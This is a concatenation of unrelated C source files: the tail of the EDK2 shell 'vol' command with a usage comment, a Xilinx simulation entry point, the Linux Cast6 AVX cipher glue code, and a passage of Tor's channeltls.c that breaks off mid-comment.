L"vol"); ShellStatus = SHELL_OUT_OF_RESOURCES; } } if (SysInfo != NULL) { StrCpyS ( (CHAR16 *) SysInfo->VolumeLabel, (Size1>Size2? 
Size1/sizeof(CHAR16) : Size2/sizeof(CHAR16)), Name ); SysInfo->Size = SIZE_OF_EFI_FILE_SYSTEM_INFO + Size1; Status = EfiFpHandle->SetInfo( EfiFpHandle, &gEfiFileSystemInfoGuid, (UINTN)SysInfo->Size, SysInfo); } } FreePool(SysInfo); if (Delete || Name != NULL) { if (EFI_ERROR(Status)) { ShellPrintHiiEx(-1, -1, NULL, STRING_TOKEN (STR_GEN_FILE_AD), gShellLevel2HiiHandle, L"vol", Path); ShellStatus = SHELL_ACCESS_DENIED; } } SysInfoSize = 0; SysInfo = NULL; Status = EfiFpHandle->GetInfo( EfiFpHandle, &gEfiFileSystemInfoGuid, &SysInfoSize, SysInfo); if (Status == EFI_BUFFER_TOO_SMALL) { SysInfo = AllocateZeroPool(SysInfoSize); Status = EfiFpHandle->GetInfo( EfiFpHandle, &gEfiFileSystemInfoGuid, &SysInfoSize, SysInfo); } gEfiShellProtocol->CloseFile(ShellFileHandle); ASSERT(SysInfo != NULL); if (SysInfo != NULL) { // // print VolumeInfo table // ShellPrintHiiEx ( 0, gST->ConOut->Mode->CursorRow, NULL, STRING_TOKEN (STR_VOL_VOLINFO), gShellLevel2HiiHandle, SysInfo->VolumeLabel, SysInfo->ReadOnly?L"r":L"rw", SysInfo->VolumeSize, SysInfo->FreeSpace, SysInfo->BlockSize ); SHELL_FREE_NON_NULL(SysInfo); } return (ShellStatus); } STATIC CONST SHELL_PARAM_ITEM ParamList[] = { {L"-d", TypeFlag}, {L"-n", TypeValue}, {NULL, TypeMax} }; /** Function for 'Vol' command. @param[in] ImageHandle Handle to the Image (NULL if Internal). @param[in] SystemTable Pointer to the System Table (NULL if Internal). **/ SHELL_STATUS EFIAPI ShellCommandRunVol ( IN EFI_HANDLE ImageHandle, IN EFI_SYSTEM_TABLE *SystemTable ) { EFI_STATUS Status; LIST_ENTRY *Package; CHAR16 *ProblemParam; SHELL_STATUS ShellStatus; CONST CHAR16 *PathName; CONST CHAR16 *CurDir; BOOLEAN DeleteMode; CHAR16 *FullPath; CHAR16 *TempSpot; UINTN Length; CONST CHAR16 *NewName; Length = 0; ProblemParam = NULL; ShellStatus = SHELL_SUCCESS; PathName = NULL; CurDir = NULL; FullPath = NULL; // // initialize the shell lib (we must be in non-auto-init...) // Status = ShellInitialize(); ASSERT_EFI_ERROR(Status); // // Fix local copies of the protocol pointers // Status = CommandInit(); ASSERT_EFI_ERROR(Status); // // parse the command line // Status = ShellCommandLineParse (ParamList, &Package, &ProblemParam, TRUE); if (EFI_ERROR(Status)) { if (Status == EFI_VOLUME_CORRUPTED && ProblemParam != NULL) { ShellPrintHiiEx(-1, -1, NULL, STRING_TOKEN (STR_GEN_PROBLEM), gShellLevel2HiiHandle, L"vol", ProblemParam); FreePool(ProblemParam); ShellStatus = SHELL_INVALID_PARAMETER; } else { ASSERT(FALSE); } } else { // // check for "-?" 
// if (ShellCommandLineGetFlag(Package, L"-?")) { ASSERT(FALSE); } if (ShellCommandLineGetCount(Package) > 2) { ShellPrintHiiEx(-1, -1, NULL, STRING_TOKEN (STR_GEN_TOO_MANY), gShellLevel2HiiHandle, L"vol"); ShellStatus = SHELL_INVALID_PARAMETER; } else { PathName = ShellCommandLineGetRawValue(Package, 1); if (PathName == NULL) { CurDir = gEfiShellProtocol->GetCurDir(NULL); if (CurDir == NULL) { ShellStatus = SHELL_NOT_FOUND; ShellPrintHiiEx(-1, -1, NULL, STRING_TOKEN (STR_GEN_NO_CWD), gShellLevel2HiiHandle, L"vol"); } else { PathName = CurDir; } } if (PathName != NULL) { TempSpot = StrStr(PathName, L":"); if (TempSpot != NULL) { *TempSpot = CHAR_NULL; } TempSpot = StrStr(PathName, L"\\"); if (TempSpot != NULL) { *TempSpot = CHAR_NULL; } StrnCatGrow(&FullPath, &Length, PathName, 0); StrnCatGrow(&FullPath, &Length, L":\\", 0); DeleteMode = ShellCommandLineGetFlag(Package, L"-d"); NewName = ShellCommandLineGetValue(Package, L"-n"); if (DeleteMode && ShellCommandLineGetFlag(Package, L"-n")) { ShellPrintHiiEx(-1, -1, NULL, STRING_TOKEN (STR_GEN_PARAM_CONFLICT), gShellLevel2HiiHandle, L"vol", L"-d", L"-n"); ShellStatus = SHELL_INVALID_PARAMETER; } else if (ShellCommandLineGetFlag(Package, L"-n") && NewName == NULL) { ShellPrintHiiEx(-1, -1, NULL, STRING_TOKEN (STR_GEN_NO_VALUE), gShellLevel2HiiHandle, L"vol", L"-n"); ShellStatus = SHELL_INVALID_PARAMETER; } else if (NewName != NULL && StrLen(NewName) > 11) { ShellPrintHiiEx(-1, -1, NULL, STRING_TOKEN (STR_GEN_PROBLEM_VAL), gShellLevel2HiiHandle, L"vol", NewName, L"-n"); ShellStatus = SHELL_INVALID_PARAMETER; } else if (ShellStatus == SHELL_SUCCESS) { ShellStatus = HandleVol( FullPath, DeleteMode, NewName ); } } } } SHELL_FREE_NON_NULL(FullPath); // // free the command line package // ShellCommandLineFreeVarList (Package); return (ShellStatus); }
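//
// Usage notes, read off the argument handling above (not taken from EDK2
// documentation):
//
//   vol                  -- show volume info for the current file system
//   vol fs0:             -- show volume info for fs0:
//   vol fs0: -n NEWNAME  -- set the volume label (at most 11 characters;
//                           %^*+=[]|:;"<>?/ and spaces are rejected)
//   vol fs0: -d          -- delete the volume label (-d conflicts with -n)
//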
350421.c
/**********************************************************************/ /* ____ ____ */ /* / /\/ / */ /* /___/ \ / */ /* \ \ \/ */ /* \ \ Copyright (c) 2003-2009 Xilinx, Inc. */ /* / / All Right Reserved. */ /* /---/ /\ */ /* \ \ / \ */ /* \___\/\___\ */ /***********************************************************************/ #include "xsi.h" struct XSI_INFO xsi_info; char *IEEE_P_2592010699; char *IEEE_P_1242562249; char *STD_STANDARD; int main(int argc, char **argv) { xsi_init_design(argc, argv); xsi_register_info(&xsi_info); xsi_register_min_prec_unit(-12); ieee_p_2592010699_init(); ieee_p_1242562249_init(); work_a_1071152751_3212880686_init(); work_a_0918718219_3212880686_init(); work_a_1652397429_3212880686_init(); work_a_0719060090_2372691052_init(); xsi_register_tops("work_a_0719060090_2372691052"); IEEE_P_2592010699 = xsi_get_engine_memory("ieee_p_2592010699"); xsi_register_ieee_std_logic_1164(IEEE_P_2592010699); IEEE_P_1242562249 = xsi_get_engine_memory("ieee_p_1242562249"); STD_STANDARD = xsi_get_engine_memory("std_standard"); return xsi_run_simulation(argc, argv); }
942856.c
// SPDX-License-Identifier: GPL-2.0-or-later /* * Glue Code for the AVX assembler implementation of the Cast6 Cipher * * Copyright (C) 2012 Johannes Goetzfried * <Johannes.Goetzfried@informatik.stud.uni-erlangen.de> * * Copyright © 2013 Jussi Kivilinna <jussi.kivilinna@iki.fi> */ #include <linux/module.h> #include <linux/types.h> #include <linux/crypto.h> #include <linux/err.h> #include <crypto/algapi.h> #include <crypto/cast6.h> #include <crypto/internal/simd.h> #include "ecb_cbc_helpers.h" #define CAST6_PARALLEL_BLOCKS 8 asmlinkage void cast6_ecb_enc_8way(const void *ctx, u8 *dst, const u8 *src); asmlinkage void cast6_ecb_dec_8way(const void *ctx, u8 *dst, const u8 *src); asmlinkage void cast6_cbc_dec_8way(const void *ctx, u8 *dst, const u8 *src); static int cast6_setkey_skcipher(struct crypto_skcipher *tfm, const u8 *key, unsigned int keylen) { return cast6_setkey(&tfm->base, key, keylen); } static int ecb_encrypt(struct skcipher_request *req) { ECB_WALK_START(req, CAST6_BLOCK_SIZE, CAST6_PARALLEL_BLOCKS); ECB_BLOCK(CAST6_PARALLEL_BLOCKS, cast6_ecb_enc_8way); ECB_BLOCK(1, __cast6_encrypt); ECB_WALK_END(); } static int ecb_decrypt(struct skcipher_request *req) { ECB_WALK_START(req, CAST6_BLOCK_SIZE, CAST6_PARALLEL_BLOCKS); ECB_BLOCK(CAST6_PARALLEL_BLOCKS, cast6_ecb_dec_8way); ECB_BLOCK(1, __cast6_decrypt); ECB_WALK_END(); } static int cbc_encrypt(struct skcipher_request *req) { CBC_WALK_START(req, CAST6_BLOCK_SIZE, -1); CBC_ENC_BLOCK(__cast6_encrypt); CBC_WALK_END(); } static int cbc_decrypt(struct skcipher_request *req) { CBC_WALK_START(req, CAST6_BLOCK_SIZE, CAST6_PARALLEL_BLOCKS); CBC_DEC_BLOCK(CAST6_PARALLEL_BLOCKS, cast6_cbc_dec_8way); CBC_DEC_BLOCK(1, __cast6_decrypt); CBC_WALK_END(); } static struct skcipher_alg cast6_algs[] = { { .base.cra_name = "__ecb(cast6)", .base.cra_driver_name = "__ecb-cast6-avx", .base.cra_priority = 200, .base.cra_flags = CRYPTO_ALG_INTERNAL, .base.cra_blocksize = CAST6_BLOCK_SIZE, .base.cra_ctxsize = sizeof(struct cast6_ctx), .base.cra_module = THIS_MODULE, .min_keysize = CAST6_MIN_KEY_SIZE, .max_keysize = CAST6_MAX_KEY_SIZE, .setkey = cast6_setkey_skcipher, .encrypt = ecb_encrypt, .decrypt = ecb_decrypt, }, { .base.cra_name = "__cbc(cast6)", .base.cra_driver_name = "__cbc-cast6-avx", .base.cra_priority = 200, .base.cra_flags = CRYPTO_ALG_INTERNAL, .base.cra_blocksize = CAST6_BLOCK_SIZE, .base.cra_ctxsize = sizeof(struct cast6_ctx), .base.cra_module = THIS_MODULE, .min_keysize = CAST6_MIN_KEY_SIZE, .max_keysize = CAST6_MAX_KEY_SIZE, .ivsize = CAST6_BLOCK_SIZE, .setkey = cast6_setkey_skcipher, .encrypt = cbc_encrypt, .decrypt = cbc_decrypt, }, }; static struct simd_skcipher_alg *cast6_simd_algs[ARRAY_SIZE(cast6_algs)]; static int __init cast6_init(void) { const char *feature_name; if (!cpu_has_xfeatures(XFEATURE_MASK_SSE | XFEATURE_MASK_YMM, &feature_name)) { pr_info("CPU feature '%s' is not supported.\n", feature_name); return -ENODEV; } return simd_register_skciphers_compat(cast6_algs, ARRAY_SIZE(cast6_algs), cast6_simd_algs); } static void __exit cast6_exit(void) { simd_unregister_skciphers(cast6_algs, ARRAY_SIZE(cast6_algs), cast6_simd_algs); } module_init(cast6_init); module_exit(cast6_exit); MODULE_DESCRIPTION("Cast6 Cipher Algorithm, AVX optimized"); MODULE_LICENSE("GPL"); MODULE_ALIAS_CRYPTO("cast6");
377367.c
/* * Copyright (c) 2012-2013, The Tor Project, Inc. */ /* See LICENSE for licensing information */ /** * \file channeltls.c * \brief channel_t concrete subclass using or_connection_t **/ /* * Define this so channel.h gives us things only channel_t subclasses * should touch. */ #define TOR_CHANNEL_INTERNAL_ #include "or.h" #include "channel.h" #include "channeltls.h" #include "circuitmux.h" #include "circuitmux_ewma.h" #include "config.h" #include "connection.h" #include "connection_or.h" #include "control.h" #include "hibernate.h" #include "main.h" #include "relay.h" #include "router.h" #include "routerlist.h" /** How many CELL_PADDING cells have we received, ever? */ uint64_t stats_n_padding_cells_processed = 0; /** How many CELL_VERSIONS cells have we received, ever? */ uint64_t stats_n_versions_cells_processed = 0; /** How many CELL_NETINFO cells have we received, ever? */ uint64_t stats_n_netinfo_cells_processed = 0; /** How many CELL_VPADDING cells have we received, ever? */ uint64_t stats_n_vpadding_cells_processed = 0; /** How many CELL_CERTS cells have we received, ever? */ uint64_t stats_n_certs_cells_processed = 0; /** How many CELL_AUTH_CHALLENGE cells have we received, ever? */ uint64_t stats_n_auth_challenge_cells_processed = 0; /** How many CELL_AUTHENTICATE cells have we received, ever? */ uint64_t stats_n_authenticate_cells_processed = 0; /** How many CELL_AUTHORIZE cells have we received, ever? */ uint64_t stats_n_authorize_cells_processed = 0; /** Active listener, if any */ channel_listener_t *channel_tls_listener = NULL; /* Utility function declarations */ static void channel_tls_common_init(channel_tls_t *tlschan); /* channel_tls_t method declarations */ static void channel_tls_close_method(channel_t *chan); static const char * channel_tls_describe_transport_method(channel_t *chan); static void channel_tls_free_method(channel_t *chan); static int channel_tls_get_remote_addr_method(channel_t *chan, tor_addr_t *addr_out); static int channel_tls_get_transport_name_method(channel_t *chan, char **transport_out); static const char * channel_tls_get_remote_descr_method(channel_t *chan, int flags); static int channel_tls_has_queued_writes_method(channel_t *chan); static int channel_tls_is_canonical_method(channel_t *chan, int req); static int channel_tls_matches_extend_info_method(channel_t *chan, extend_info_t *extend_info); static int channel_tls_matches_target_method(channel_t *chan, const tor_addr_t *target); static int channel_tls_write_cell_method(channel_t *chan, cell_t *cell, circuit_t *circ); static int channel_tls_write_packed_cell_method(channel_t *chan, or_connection_t *conn, circuit_t *circ, packed_cell_t *packed_cell); static int channel_tls_write_var_cell_method(channel_t *chan, var_cell_t *var_cell, circuit_t *circ); /* channel_listener_tls_t method declarations */ static void channel_tls_listener_close_method(channel_listener_t *chan_l); static const char * channel_tls_listener_describe_transport_method(channel_listener_t *chan_l); /** Handle incoming cells for the handshake stuff here rather than * passing them on up. 
*/ static void channel_tls_process_versions_cell(var_cell_t *cell, channel_t *chan, or_connection_t *conn); static void channel_tls_process_netinfo_cell(cell_t *cell, channel_t *chan, or_connection_t *conn); static void channel_tls_process_certs_cell(var_cell_t *cell, channel_t *chan, or_connection_t *conn); static void channel_tls_process_auth_challenge_cell(var_cell_t *cell, channel_t *chan, or_connection_t *conn); static void channel_tls_process_authenticate_cell(var_cell_t *cell, channel_t *chan, or_connection_t *conn); static int command_allowed_before_handshake(uint8_t command); static int enter_v3_handshake_with_cell(var_cell_t *cell, channel_t *chan, or_connection_t *conn); /** * Do parts of channel_tls_t initialization common to channel_tls_connect() * and channel_tls_handle_incoming(). */ static void channel_tls_common_init(channel_tls_t *tlschan) { channel_t *chan; tor_assert(tlschan); chan = &(tlschan->base_); channel_init(chan); chan->magic = TLS_CHAN_MAGIC; chan->type = CHANNEL_TYPE_TLS; chan->state = CHANNEL_STATE_OPENING; chan->close = channel_tls_close_method; chan->describe_transport = channel_tls_describe_transport_method; chan->free = channel_tls_free_method; chan->get_remote_addr = channel_tls_get_remote_addr_method; chan->get_remote_descr = channel_tls_get_remote_descr_method; chan->get_transport_name = channel_tls_get_transport_name_method; chan->has_queued_writes = channel_tls_has_queued_writes_method; chan->is_canonical = channel_tls_is_canonical_method; chan->matches_extend_info = channel_tls_matches_extend_info_method; chan->matches_target = channel_tls_matches_target_method; chan->write_cell = channel_tls_write_cell_method; chan->write_packed_cell = channel_tls_write_packed_cell_method; chan->write_var_cell = channel_tls_write_var_cell_method; chan->cmux = circuitmux_alloc(); if (cell_ewma_enabled()) { circuitmux_set_policy(chan->cmux, &ewma_policy); } } /** * Start a new TLS channel * * Launch a new OR connection to <b>addr</b>:<b>port</b> and expect to * handshake with an OR with identity digest <b>id_digest</b>, and wrap * it in a channel_tls_t. 
*/ channel_t * channel_tls_connect(const tor_addr_t *addr, uint16_t port, const char *id_digest) { channel_tls_t *tlschan = tor_malloc_zero(sizeof(*tlschan)); channel_t *chan = &(tlschan->base_); channel_tls_common_init(tlschan); log_debug(LD_CHANNEL, "In channel_tls_connect() for channel %p " "(global id " U64_FORMAT ")", tlschan, U64_PRINTF_ARG(chan->global_identifier)); if (is_local_addr(addr)) channel_mark_local(chan); channel_mark_outgoing(chan); /* Set up or_connection stuff */ tlschan->conn = connection_or_connect(addr, port, id_digest, chan); /* connection_or_connect() will fill in tlschan->conn */ if (!(tlschan->conn)) { chan->reason_for_closing = CHANNEL_CLOSE_FOR_ERROR; channel_change_state(chan, CHANNEL_STATE_ERROR); goto err; } log_debug(LD_CHANNEL, "Got orconn %p for channel with global id " U64_FORMAT, tlschan->conn, U64_PRINTF_ARG(chan->global_identifier)); goto done; err: circuitmux_free(chan->cmux); tor_free(tlschan); chan = NULL; done: /* If we got one, we should register it */ if (chan) channel_register(chan); return chan; } /** * Return the current channel_tls_t listener * * Returns the current channel listener for incoming TLS connections, or * NULL if none has been established */ channel_listener_t * channel_tls_get_listener(void) { return channel_tls_listener; } /** * Start a channel_tls_t listener if necessary * * Return the current channel_tls_t listener, or start one if we haven't yet, * and return that. */ channel_listener_t * channel_tls_start_listener(void) { channel_listener_t *listener; if (!channel_tls_listener) { listener = tor_malloc_zero(sizeof(*listener)); channel_init_listener(listener); listener->state = CHANNEL_LISTENER_STATE_LISTENING; listener->close = channel_tls_listener_close_method; listener->describe_transport = channel_tls_listener_describe_transport_method; channel_tls_listener = listener; log_debug(LD_CHANNEL, "Starting TLS channel listener %p with global id " U64_FORMAT, listener, U64_PRINTF_ARG(listener->global_identifier)); channel_listener_register(listener); } else listener = channel_tls_listener; return listener; } /** * Free everything on shutdown * * Not much to do here, since channel_free_all() takes care of a lot, but let's * get rid of the listener. */ void channel_tls_free_all(void) { channel_listener_t *old_listener = NULL; log_debug(LD_CHANNEL, "Shutting down TLS channels..."); if (channel_tls_listener) { /* * When we close it, channel_tls_listener will get nulled out, so save * a pointer so we can free it. 
*/
    old_listener = channel_tls_listener;
    log_debug(LD_CHANNEL,
              "Closing channel_tls_listener with ID " U64_FORMAT
              " at %p.",
              U64_PRINTF_ARG(old_listener->global_identifier),
              old_listener);
    channel_listener_unregister(old_listener);
    channel_listener_mark_for_close(old_listener);
    channel_listener_free(old_listener);
    tor_assert(channel_tls_listener == NULL);
  }

  log_debug(LD_CHANNEL,
            "Done shutting down TLS channels");
}

/**
 * Create a new channel around an incoming or_connection_t
 */

channel_t *
channel_tls_handle_incoming(or_connection_t *orconn)
{
  channel_tls_t *tlschan = tor_malloc_zero(sizeof(*tlschan));
  channel_t *chan = &(tlschan->base_);

  tor_assert(orconn);
  tor_assert(!(orconn->chan));

  channel_tls_common_init(tlschan);

  /* Link the channel and orconn to each other */
  tlschan->conn = orconn;
  orconn->chan = chan;

  if (is_local_addr(&(TO_CONN(orconn)->addr)))
    channel_mark_local(chan);

  channel_mark_incoming(chan);

  /* Register it */
  channel_register(chan);

  return chan;
}

/*********
 * Casts *
 ********/

/**
 * Cast a channel_tls_t to a channel_t.
 */

channel_t *
channel_tls_to_base(channel_tls_t *tlschan)
{
  if (!tlschan) return NULL;

  return &(tlschan->base_);
}

/**
 * Get the or_connection_t associated with a channel_tls_t; returns NULL
 * if tlschan is NULL.
 */

or_connection_t *
channel_tls_to_orconn(channel_tls_t *tlschan)
{
  if (!tlschan) return NULL;

  return tlschan->conn;
}

/**
 * Cast a channel_t to a channel_tls_t, with appropriate type-checking
 * asserts.
 */

channel_tls_t *
channel_tls_from_base(channel_t *chan)
{
  if (!chan) return NULL;

  tor_assert(chan->magic == TLS_CHAN_MAGIC);

  return (channel_tls_t *)(chan);
}

/********************************************
 * Method implementations for channel_tls_t *
 *******************************************/

/**
 * Close a channel_tls_t
 *
 * This implements the close method for channel_tls_t
 */

static void
channel_tls_close_method(channel_t *chan)
{
  channel_tls_t *tlschan = BASE_CHAN_TO_TLS(chan);

  tor_assert(tlschan);

  if (tlschan->conn) connection_or_close_normally(tlschan->conn, 1);
  else {
    /* Weird - we'll have to change the state ourselves, I guess */
    log_info(LD_CHANNEL,
             "Tried to close channel_tls_t %p with NULL conn",
             tlschan);
    channel_change_state(chan, CHANNEL_STATE_ERROR);
  }
}

/**
 * Describe the transport for a channel_tls_t
 *
 * This returns the string "TLS channel on connection <id>" to the upper
 * layer.
 */

static const char *
channel_tls_describe_transport_method(channel_t *chan)
{
  static char *buf = NULL;
  uint64_t id;
  channel_tls_t *tlschan;
  const char *rv = NULL;

  tor_assert(chan);

  tlschan = BASE_CHAN_TO_TLS(chan);

  if (tlschan->conn) {
    id = TO_CONN(tlschan->conn)->global_identifier;

    if (buf) tor_free(buf);
    tor_asprintf(&buf,
                 "TLS channel (connection " U64_FORMAT ")",
                 U64_PRINTF_ARG(id));

    rv = buf;
  } else {
    rv = "TLS channel (no connection)";
  }

  return rv;
}

/**
 * Free a channel_tls_t
 *
 * This is called by the generic channel layer when freeing a channel_tls_t;
 * this happens either on a channel which has already reached
 * CHANNEL_STATE_CLOSED or CHANNEL_STATE_ERROR from channel_run_cleanup() or
 * on shutdown from channel_free_all().  In the latter case we might still
 * have an orconn active (which connection_free_all() will get to later),
 * so we should null out its channel pointer now.
 */

static void
channel_tls_free_method(channel_t *chan)
{
  channel_tls_t *tlschan = BASE_CHAN_TO_TLS(chan);

  tor_assert(tlschan);

  if (tlschan->conn) {
    tlschan->conn->chan = NULL;
    tlschan->conn = NULL;
  }
}

/**
 * Get the remote address of a channel_tls_t
 *
 * This implements the get_remote_addr method for channel_tls_t; copy the
 * remote endpoint of the channel to addr_out and return 1 (always
 * succeeds for this transport).
 */

static int
channel_tls_get_remote_addr_method(channel_t *chan, tor_addr_t *addr_out)
{
  int rv = 0;
  channel_tls_t *tlschan = BASE_CHAN_TO_TLS(chan);

  tor_assert(tlschan);
  tor_assert(addr_out);

  if (tlschan->conn) {
    tor_addr_copy(addr_out, &(TO_CONN(tlschan->conn)->addr));
    rv = 1;
  } else tor_addr_make_unspec(addr_out);

  return rv;
}

/**
 * Get the name of the pluggable transport used by a channel_tls_t.
 *
 * This implements the get_transport_name method for channel_tls_t.  If the
 * channel uses a pluggable transport, copy its name to
 * <b>transport_out</b> and return 0.  If the channel did not use a
 * pluggable transport, return -1.
 */

static int
channel_tls_get_transport_name_method(channel_t *chan, char **transport_out)
{
  channel_tls_t *tlschan = BASE_CHAN_TO_TLS(chan);

  tor_assert(tlschan);
  tor_assert(transport_out);
  tor_assert(tlschan->conn);

  if (!tlschan->conn->ext_or_transport)
    return -1;

  *transport_out = tor_strdup(tlschan->conn->ext_or_transport);
  return 0;
}

/**
 * Get endpoint description of a channel_tls_t
 *
 * This implements the get_remote_descr method for channel_tls_t; it returns
 * a text description of the remote endpoint of the channel suitable for use
 * in log messages.  The flags parameter selects between the canonical and
 * the actually observed address, with or without the port (see the
 * GRD_FLAG_* cases below).
 */

static const char *
channel_tls_get_remote_descr_method(channel_t *chan, int flags)
{
#define MAX_DESCR_LEN 32

  static char buf[MAX_DESCR_LEN + 1];
  channel_tls_t *tlschan = BASE_CHAN_TO_TLS(chan);
  connection_t *conn;
  const char *answer = NULL;
  char *addr_str;

  tor_assert(tlschan);

  if (tlschan->conn) {
    conn = TO_CONN(tlschan->conn);
    switch (flags) {
      case 0:
        /* Canonical address with port */
        tor_snprintf(buf, MAX_DESCR_LEN + 1,
                     "%s:%u", conn->address, conn->port);
        answer = buf;
        break;
      case GRD_FLAG_ORIGINAL:
        /* Actual address with port */
        addr_str = tor_dup_addr(&(tlschan->conn->real_addr));
        tor_snprintf(buf, MAX_DESCR_LEN + 1,
                     "%s:%u", addr_str, conn->port);
        tor_free(addr_str);
        answer = buf;
        break;
      case GRD_FLAG_ADDR_ONLY:
        /* Canonical address, no port */
        strlcpy(buf, conn->address, sizeof(buf));
        answer = buf;
        break;
      case GRD_FLAG_ORIGINAL|GRD_FLAG_ADDR_ONLY:
        /* Actual address, no port */
        addr_str = tor_dup_addr(&(tlschan->conn->real_addr));
        strlcpy(buf, addr_str, sizeof(buf));
        tor_free(addr_str);
        answer = buf;
        break;
      default:
        /* Something's broken in channel.c; this should never be reached */
        tor_assert(0);
    }
  } else {
    strlcpy(buf, "(No connection)", sizeof(buf));
    answer = buf;
  }

  return answer;
}

/**
 * Tell the upper layer if we have queued writes
 *
 * This implements the has_queued_writes method for channel_tls_t; it
 * returns 1 iff we have queued writes on the outbuf of the underlying
 * or_connection_t.
 */

static int
channel_tls_has_queued_writes_method(channel_t *chan)
{
  size_t outbuf_len;
  channel_tls_t *tlschan = BASE_CHAN_TO_TLS(chan);

  tor_assert(tlschan);
  if (!(tlschan->conn)) {
    log_info(LD_CHANNEL,
             "something called has_queued_writes on a tlschan "
             "(%p with ID " U64_FORMAT " but no conn",
             chan, U64_PRINTF_ARG(chan->global_identifier));
  }

  outbuf_len = (tlschan->conn != NULL) ?
    connection_get_outbuf_len(TO_CONN(tlschan->conn)) :
    0;

  return (outbuf_len > 0);
}

/**
 * Tell the upper layer if we're canonical
 *
 * This implements the is_canonical method for channel_tls_t: if req is
 * zero, it returns whether this is a canonical channel; if req is one, it
 * returns whether the is_canonical bit can be relied upon.
 */

static int
channel_tls_is_canonical_method(channel_t *chan, int req)
{
  int answer = 0;
  channel_tls_t *tlschan = BASE_CHAN_TO_TLS(chan);

  tor_assert(tlschan);

  if (tlschan->conn) {
    switch (req) {
      case 0:
        answer = tlschan->conn->is_canonical;
        break;
      case 1:
        /*
         * Is the is_canonical bit reliable?  In link protocol version 2
         * and up we get the canonical address from a NETINFO cell, but in
         * older versions it might be based on an obsolete descriptor.
         */
        answer = (tlschan->conn->link_proto >= 2);
        break;
      default:
        /* This shouldn't happen; channel.c is broken if it does */
        tor_assert(0);
    }
  }
  /* else return 0 for tlschan->conn == NULL */

  return answer;
}

/**
 * Check if we match an extend_info_t
 *
 * This implements the matches_extend_info method for channel_tls_t; the
 * upper layer wants to know if this channel matches an extend_info_t.
 */

static int
channel_tls_matches_extend_info_method(channel_t *chan,
                                       extend_info_t *extend_info)
{
  channel_tls_t *tlschan = BASE_CHAN_TO_TLS(chan);

  tor_assert(tlschan);
  tor_assert(extend_info);

  /* Never match if we have no conn */
  if (!(tlschan->conn)) {
    log_info(LD_CHANNEL,
             "something called matches_extend_info on a tlschan "
             "(%p with ID " U64_FORMAT " but no conn",
             chan, U64_PRINTF_ARG(chan->global_identifier));
    return 0;
  }

  return (tor_addr_eq(&(extend_info->addr),
                      &(TO_CONN(tlschan->conn)->addr)) &&
          (extend_info->port == TO_CONN(tlschan->conn)->port));
}

/**
 * Check if we match a target address; return true iff we do.
 *
 * This implements the matches_target method for channel_tls_t; the upper
 * layer wants to know if this channel matches a target address when
 * extending a circuit.
 */

static int
channel_tls_matches_target_method(channel_t *chan,
                                  const tor_addr_t *target)
{
  channel_tls_t *tlschan = BASE_CHAN_TO_TLS(chan);

  tor_assert(tlschan);
  tor_assert(target);

  /* Never match if we have no conn */
  if (!(tlschan->conn)) {
    log_info(LD_CHANNEL,
             "something called matches_target on a tlschan "
             "(%p with ID " U64_FORMAT " but no conn",
             chan, U64_PRINTF_ARG(chan->global_identifier));
    return 0;
  }

  return tor_addr_eq(&(tlschan->conn->real_addr), target);
}

/**
 * Write a cell to a channel_tls_t
 *
 * This implements the write_cell method for channel_tls_t; given a
 * channel_tls_t and a cell_t, transmit the cell_t.
 */

static int
channel_tls_write_cell_method(channel_t *chan, cell_t *cell, circuit_t *circ)
{
  channel_tls_t *tlschan = BASE_CHAN_TO_TLS(chan);
  int written = 0;

  tor_assert(tlschan);
  tor_assert(cell);

  if (tlschan->conn) {
    log_info(LD_GENERAL,
             "writing cell on circ %u to conn %p on channel %p",
             cell->circ_id, tlschan->conn, tlschan);
    connection_or_write_cell_to_buf(cell, tlschan->conn);
    ++written;
  } else {
    log_info(LD_CHANNEL,
             "something called write_cell on a tlschan "
             "(%p with ID " U64_FORMAT " but no conn",
             chan, U64_PRINTF_ARG(chan->global_identifier));
  }

  return written;
}

/**
 * Write a packed cell to a channel_tls_t
 *
 * This implements the write_packed_cell method for channel_tls_t; given a
 * channel_tls_t and a packed_cell_t, transmit the packed_cell_t.
*/ static int channel_tls_write_packed_cell_method(channel_t *chan, or_connection_t *conn, circuit_t *circ, packed_cell_t *packed_cell) { channel_tls_t *tlschan = BASE_CHAN_TO_TLS(chan); size_t cell_network_size = get_cell_network_size(chan->wide_circ_ids); int written = 0; tor_assert(tlschan); tor_assert(packed_cell); if (tlschan->conn) { connection_write_to_buf(packed_cell->body, cell_network_size, TO_CONN(tlschan->conn)); /* This is where the cell is finished; used to be done from relay.c */ packed_cell_free(packed_cell); ++written; } else { log_info(LD_CHANNEL, "something called write_packed_cell on a tlschan " "(%p with ID " U64_FORMAT " but no conn", chan, U64_PRINTF_ARG(chan->global_identifier)); } return written; } /** * Write a variable-length cell to a channel_tls_t * * This implements the write_var_cell method for channel_tls_t; given a * channel_tls_t and a var_cell_t, transmit the var_cell_t. */ static int channel_tls_write_var_cell_method(channel_t *chan, var_cell_t *var_cell, circuit_t *circ) { channel_tls_t *tlschan = BASE_CHAN_TO_TLS(chan); int written = 0; tor_assert(tlschan); tor_assert(var_cell); if (tlschan->conn) { connection_or_write_var_cell_to_buf(var_cell, tlschan->conn); ++written; } else { log_info(LD_CHANNEL, "something called write_var_cell on a tlschan " "(%p with ID " U64_FORMAT " but no conn", chan, U64_PRINTF_ARG(chan->global_identifier)); } return written; } /************************************************* * Method implementations for channel_listener_t * ************************************************/ /** * Close a channel_listener_t * * This implements the close method for channel_listener_t */ static void channel_tls_listener_close_method(channel_listener_t *chan_l) { tor_assert(chan_l); /* * Listeners we just go ahead and change state through to CLOSED, but * make sure to check if they're channel_tls_listener to NULL it out. */ if (chan_l == channel_tls_listener) channel_tls_listener = NULL; if (!(chan_l->state == CHANNEL_LISTENER_STATE_CLOSING || chan_l->state == CHANNEL_LISTENER_STATE_CLOSED || chan_l->state == CHANNEL_LISTENER_STATE_ERROR)) { channel_listener_change_state(chan_l, CHANNEL_LISTENER_STATE_CLOSING); } if (chan_l->incoming_list) { SMARTLIST_FOREACH_BEGIN(chan_l->incoming_list, channel_t *, ichan) { channel_mark_for_close(ichan); } SMARTLIST_FOREACH_END(ichan); smartlist_free(chan_l->incoming_list); chan_l->incoming_list = NULL; } if (!(chan_l->state == CHANNEL_LISTENER_STATE_CLOSED || chan_l->state == CHANNEL_LISTENER_STATE_ERROR)) { channel_listener_change_state(chan_l, CHANNEL_LISTENER_STATE_CLOSED); } } /** * Describe the transport for a channel_listener_t * * This returns the string "TLS channel (listening)" to the upper * layer. */ static const char * channel_tls_listener_describe_transport_method(channel_listener_t *chan_l) { tor_assert(chan_l); return "TLS channel (listening)"; } /******************************************************* * Functions for handling events on an 